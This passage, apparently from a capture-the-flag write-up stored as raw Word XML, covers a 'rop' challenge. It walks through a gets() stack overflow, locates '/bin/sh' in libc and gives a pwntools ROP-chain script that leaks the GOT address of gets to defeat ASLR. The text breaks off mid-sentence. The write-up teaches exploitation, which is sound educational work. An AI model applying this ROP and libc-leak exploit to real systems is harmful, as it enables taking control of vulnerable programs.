                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4DB32133" w14:textId="419B2EEA" w:rsidR="006C5A4E" w:rsidRDefault="006C5A4E" w:rsidP="006C5A4E">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>First Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3DE991" w14:textId="4B4B9ACF" w:rsidR="006C5A4E" w:rsidRDefault="006C5A4E" w:rsidP="006C5A4E">
      <w:r>
        <w:t xml:space="preserve">The program main method looks very similar to the one in </w:t>
      </w:r>
      <w:hyperlink w:anchor="_Inspector" w:history="1">
        <w:r w:rsidRPr="006C5A4E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Inspector</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="006C5A4E" w14:paraId="36359BB9" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10170" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="6615082B" w14:textId="77777777" w:rsidR="006C5A4E" w:rsidRPr="006C5A4E" w:rsidRDefault="006C5A4E" w:rsidP="006C5A4E">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006C5A4E">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>void main(EVP_PKEY_CTX *param_1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FE750AE" w14:textId="77777777" w:rsidR="006C5A4E" w:rsidRPr="006C5A4E" w:rsidRDefault="006C5A4E" w:rsidP="006C5A4E">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006C5A4E">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="780F1519" w14:textId="77777777" w:rsidR="006C5A4E" w:rsidRPr="006C5A4E" w:rsidRDefault="006C5A4E" w:rsidP="006C5A4E">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006C5A4E">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">  char data [32];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75A963E1" w14:textId="77777777" w:rsidR="006C5A4E" w:rsidRPr="006C5A4E" w:rsidRDefault="006C5A4E" w:rsidP="006C5A4E">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006C5A4E">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E699C0E" w14:textId="77777777" w:rsidR="006C5A4E" w:rsidRPr="006C5A4E" w:rsidRDefault="006C5A4E" w:rsidP="006C5A4E">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006C5A4E">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">  init(param_1);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3494C5E4" w14:textId="77777777" w:rsidR="006C5A4E" w:rsidRPr="006C5A4E" w:rsidRDefault="006C5A4E" w:rsidP="006C5A4E">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006C5A4E">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">  puts("Can you pop shell? I took away all the useful tools..");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A787898" w14:textId="77777777" w:rsidR="006C5A4E" w:rsidRPr="006C5A4E" w:rsidRDefault="006C5A4E" w:rsidP="006C5A4E">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006C5A4E">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">  gets(data);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AB744FA" w14:textId="77777777" w:rsidR="006C5A4E" w:rsidRPr="006C5A4E" w:rsidRDefault="006C5A4E" w:rsidP="006C5A4E">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006C5A4E">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">  return;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0255F21B" w14:textId="33DDD18F" w:rsidR="006C5A4E" w:rsidRDefault="006C5A4E" w:rsidP="006C5A4E">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r w:rsidRPr="006C5A4E">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="41A3DE9A" w14:textId="513E9C47" w:rsidR="006C5A4E" w:rsidRDefault="006C5A4E" w:rsidP="006C5A4E">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Main Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3AE459" w14:textId="1D45775E" w:rsidR="006C5A4E" w:rsidRDefault="006C5A4E" w:rsidP="006C5A4E">
      <w:r>
        <w:t>It uses gets to take in 32 bytes of input data. However, gets will overwrite the stack if the input data exceeds the buffer size. Like with Inspector, this results in RBP being overwritten after 32 bytes of data and a segmentation fault after 40 bytes of data when it overwrites the memory address on the stack that main will jump to when it returns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B54BD35" w14:textId="319FC22E" w:rsidR="006C5A4E" w:rsidRDefault="006C5A4E" w:rsidP="006C5A4E">
      <w:r>
        <w:t>This challenge will require a similar strategy to Inspector, so we begin by looking for gadgets. Unfortunately, the rop binary does not have as many gadgets in it’s code as the inspector binary. Additionally, rop does not contain the string “/bin/sh”. Luckily, that string and other important gadgets can be found in the LibC library used to import external functions such as puts and gets.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="006C5A4E" w14:paraId="54DCDDBC" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10170" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="3E3EC514" w14:textId="77777777" w:rsidR="006C5A4E" w:rsidRPr="006C5A4E" w:rsidRDefault="006C5A4E" w:rsidP="006C5A4E">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006C5A4E">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>┌──(kali</w:t>
            </w:r>
            <w:r w:rsidRPr="006C5A4E">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>㉿</w:t>
            </w:r>
            <w:r w:rsidRPr="006C5A4E">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>kali)-[~/Desktop/6-Week/ROP-Pop-Pop]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="091B720D" w14:textId="77777777" w:rsidR="006C5A4E" w:rsidRPr="006C5A4E" w:rsidRDefault="006C5A4E" w:rsidP="006C5A4E">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006C5A4E">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>└─$ strings libc-2.31.so | grep -i "bin/sh"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09D8951B" w14:textId="7CF311C5" w:rsidR="006C5A4E" w:rsidRDefault="006C5A4E" w:rsidP="006C5A4E">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r w:rsidRPr="006C5A4E">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>/bin/sh</w:t>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="38336697" w14:textId="27C6E54F" w:rsidR="006C5A4E" w:rsidRDefault="006C5A4E" w:rsidP="006C5A4E">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>/bin/sh in LibC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A1D3A3" w14:textId="7FBE6C98" w:rsidR="006C5A4E" w:rsidRDefault="00F31F10" w:rsidP="006C5A4E">
      <w:r>
        <w:t>The program loads the libc data into the stack, where the addresses change each time. Instead of hardcoding the gadget and string addresses into the solver script like with Inspector, this time we have to find the base address of libC and use that to calculate the addresses of each gadget on the go.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA8E635" w14:textId="7649D104" w:rsidR="00F31F10" w:rsidRDefault="00F31F10" w:rsidP="00F31F10">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Leaking LibC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265E09FB" w14:textId="541041B1" w:rsidR="00F31F10" w:rsidRDefault="00F31F10" w:rsidP="00F31F10">
      <w:r>
        <w:t>To find the base address of LibC, the first step is to leak the address of one of the functions loaded into the program’s GOT. The following script leaks the address of gets.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F31F10" w14:paraId="5FCEE588" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10170" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="45AFF70A" w14:textId="77777777" w:rsidR="00F31F10" w:rsidRPr="00F31F10" w:rsidRDefault="00F31F10" w:rsidP="00F31F10">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F31F10">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>def leakGets():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AA504E4" w14:textId="77777777" w:rsidR="00F31F10" w:rsidRPr="00F31F10" w:rsidRDefault="00F31F10" w:rsidP="00F31F10">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F31F10">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
              <w:t>binary = context.binary = ELF('./rop', checksec=False)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77B95287" w14:textId="77777777" w:rsidR="00F31F10" w:rsidRPr="00F31F10" w:rsidRDefault="00F31F10" w:rsidP="00F31F10">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F31F10">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B9FEB9F" w14:textId="77777777" w:rsidR="00F31F10" w:rsidRPr="00F31F10" w:rsidRDefault="00F31F10" w:rsidP="00F31F10">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F31F10">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
              <w:t># 0x00000000004006b3 : pop rdi ; ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="611EFFDC" w14:textId="77777777" w:rsidR="00F31F10" w:rsidRPr="00F31F10" w:rsidRDefault="00F31F10" w:rsidP="00F31F10">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F31F10">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
              <w:t>popRDI = p64(0x004006b3)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D4A9799" w14:textId="77777777" w:rsidR="00F31F10" w:rsidRPr="00F31F10" w:rsidRDefault="00F31F10" w:rsidP="00F31F10">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F31F10">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
              <w:t>retGdgt = p64(0x004004a9)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31A6D260" w14:textId="77777777" w:rsidR="00F31F10" w:rsidRPr="00F31F10" w:rsidRDefault="00F31F10" w:rsidP="00F31F10">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F31F10">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w14:paraId="67E18836" w14:textId="77777777" w:rsidR="00F31F10" w:rsidRPr="00F31F10" w:rsidRDefault="00F31F10" w:rsidP="00F31F10">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F31F10">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
              <w:t>pltPuts = p64(binary.plt.puts)</w:t>
            </w:r>
            <w:r w:rsidRPr="00F31F10">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F31F10">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
              <w:t># Address to call</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52336991" w14:textId="77777777" w:rsidR="00F31F10" w:rsidRPr="00F31F10" w:rsidRDefault="00F31F10" w:rsidP="00F31F10">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F31F10">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
              <w:t>gotGets = p64(binary.got.gets)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1965B360" w14:textId="77777777" w:rsidR="00F31F10" w:rsidRPr="00F31F10" w:rsidRDefault="00F31F10" w:rsidP="00F31F10">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6D9F193A" w14:textId="77777777" w:rsidR="00F31F10" w:rsidRPr="00F31F10" w:rsidRDefault="00F31F10" w:rsidP="00F31F10">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0B97BE7C" w14:textId="77777777" w:rsidR="00F31F10" w:rsidRPr="00F31F10" w:rsidRDefault="00F31F10" w:rsidP="00F31F10">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F31F10">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
              <w:t>pld = cyclic(40)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57734AA0" w14:textId="77777777" w:rsidR="00F31F10" w:rsidRPr="00F31F10" w:rsidRDefault="00F31F10" w:rsidP="00F31F10">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F31F10">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
              <w:t>pld += retGdgt + popRDI + gotGets + pltPuts</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D02C313" w14:textId="77777777" w:rsidR="00F31F10" w:rsidRPr="00F31F10" w:rsidRDefault="00F31F10" w:rsidP="00F31F10">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F31F10">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
              <w:t>return pld</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E029FC5" w14:textId="77777777" w:rsidR="00F31F10" w:rsidRPr="00F31F10" w:rsidRDefault="00F31F10" w:rsidP="00F31F10">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="75B829BF" w14:textId="77777777" w:rsidR="00F31F10" w:rsidRPr="00F31F10" w:rsidRDefault="00F31F10" w:rsidP="00F31F10">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F31F10">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>def leaky(p):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="352674DB" w14:textId="77777777" w:rsidR="00F31F10" w:rsidRPr="00F31F10" w:rsidRDefault="00F31F10" w:rsidP="00F31F10">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F31F10">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.recvuntil("tools..")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F5DC1C3" w14:textId="77777777" w:rsidR="00F31F10" w:rsidRPr="00F31F10" w:rsidRDefault="00F31F10" w:rsidP="00F31F10">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F31F10">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.sendline(leakGets())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ADF2543" w14:textId="77777777" w:rsidR="00F31F10" w:rsidRPr="00F31F10" w:rsidRDefault="00F31F10" w:rsidP="00F31F10">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F31F10">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.recvline()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DA569DD" w14:textId="77777777" w:rsidR="00F31F10" w:rsidRPr="00F31F10" w:rsidRDefault="00F31F10" w:rsidP="00F31F10">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F31F10">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
              <w:t>addr = p.recvline()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DDAF3C4" w14:textId="77777777" w:rsidR="00F31F10" w:rsidRPr="00F31F10" w:rsidRDefault="00F31F10" w:rsidP="00F31F10">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F31F10">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
              <w:t>log.info(addr)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73C66DAF" w14:textId="77777777" w:rsidR="00F31F10" w:rsidRPr="00F31F10" w:rsidRDefault="00F31F10" w:rsidP="00F31F10">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F31F10">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
              <w:t>leak = u64(addr.ljust(8, b'\x00'))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E6AB75B" w14:textId="77777777" w:rsidR="00F31F10" w:rsidRPr="00F31F10" w:rsidRDefault="00F31F10" w:rsidP="00F31F10">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F31F10">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
              <w:t>leak -= 0xa000000000000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09320AA4" w14:textId="7F08DD5F" w:rsidR="00F31F10" w:rsidRDefault="00F31F10" w:rsidP="00F31F10">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r w:rsidRPr="00F31F10">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
              <w:t>log.info("Gets leak - " + hex(leak))</w:t>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F4875D7" w14:textId="753E0958" w:rsidR="00F31F10" w:rsidRDefault="00F31F10" w:rsidP="00F31F10">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Leak Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53963AC3" w14:textId="22BE3FE5" w:rsidR="00F31F10" w:rsidRDefault="00F31F10" w:rsidP="00F31F10">
      <w:r>
        <w:t>The payload consists of 40 bytes of padding data, followed by a chain of gadgets. The first gadget points to the location of a ret in the rop binary. The second gadget points to a piece of code that will pop a value off of the stack and into the rdi register, which is used for function arguments. This is followed by the address of gets in the global offset table, which will be popped into the rdi register when the popRDI gadget executes. Finally, the last item contains an address that will call puts. When puts runs</w:t>
      </w:r>
      <w:r w:rsidR="00605848">
        <w:t>, it will print the data at the address stored in RDI, which, in this case, is the GOT address of gets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3583FC76" w14:textId="4BC5C522" w:rsidR="00605848" w:rsidRDefault="00605848" w:rsidP="00F31F10">
      <w:r>
        <w:t>The gadgets will run once main returns, meaning that the gets entry in the GOT will be populated with the actual address of the call to gets in the program stack. To test this, I ran the script with an instance of rop running in gdb.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B74A2A7" w14:textId="6D15077A" w:rsidR="00605848" w:rsidRDefault="00605848" w:rsidP="00F31F10">
      <w:r>
        <w:t xml:space="preserve">It is worth noting that, when ran locally, this script would output the address with an a appended at the beginning. This script accounts for that by subtracting </w:t>
      </w:r>
      <w:r w:rsidRPr="00605848">
        <w:t>0xa000000000000</w:t>
      </w:r>
      <w:r>
